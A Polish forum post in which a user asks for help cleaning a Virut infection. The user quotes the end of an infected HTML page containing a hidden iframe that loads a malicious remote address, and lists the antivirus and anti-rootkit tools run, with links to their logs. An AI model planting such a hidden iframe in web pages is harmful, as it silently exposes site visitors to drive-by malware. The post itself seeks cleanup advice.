"<TBODY>
<TR>
<TD class=footer align=middle>Copyright 2007 Polski Zwiazek Hokeja
na Lodzie<BR>Powered by PHP-Fusion | EP IV by Extreme Crew | Modify
by TabO<BR></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE><iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
</BODY></HTML>",
jest to odpowiedzialne za wyświetlanie komunikatu Kasperskiego i Aviry o HTML/Infected.WebPage.Gen HTML script virus. Po ręcznym usunięciu tego fragmentu strony nie są raportowane. Czy takie działnie wystarczy, czy zapisać stronę w formacie tylko html dla pewności?
Pytam bo ten skrypt do czasu użycia Combofixa odpowiedzialny za próbę uruchomienia Viruta w katalogu C:\Documents and Settings\Admin\Ustawienia lokalne\Temp oraz Temprorary Internet Files za pomocą pliku mającego w opisie we właściwościach "http://jL.chura.pl/rc/".
log Aviry - http://www.wklejto.pl/33083
Żeby było śmieszniej wszystko to próbowało się uruchomić w momencie wciśnięcia skrótu pomocy Windowsa (F1), (nie ma to jak skrót klawiaturowy do wirusa ;p), przed Combo użyłem:
SD,
SAS,
Combofix - http://www.wklejto.pl/33082
a po:
MBAM - http://www.wklejto.pl/33084
Kaspersky - http://www.wklejto.pl/33085
programów do usuwania viruta od Symanteca i AVG
dr Web - nic
Hijackthis - http://www.wklejto.pl/33086
OTListIt2 - http://www.wklejto.pl/33087 i http://www.wklejto.pl/33088
Gmer - http://www.wklejto.pl/33089
jednak one nic nie znalazły, a teraz po wciśnięciu (F1) wyskakuje prawidłowy komunikat, o niewłączonej usłudze pomocy technicznej, czyli prawidłowo.
W związku z tym mam pytanie czy dalej mi coś siedzi i plików o jakich rozszerzeniach nie przegrywać przed formatem (bo to i tak będzie konieczne zważywszy, że ciągle coś się czai). Czytałem o zawirusowaniu .exe, .scr, .php i .html, z tym że usunięcie szkodliwego fragmentu chyba zupełnie wylecza stronki więc są bezpieczne (a co z katalogiem takiej strony np. skryptami java lub php?) ?
Czy czegoś jeszcze nie powinienem przegrywać?
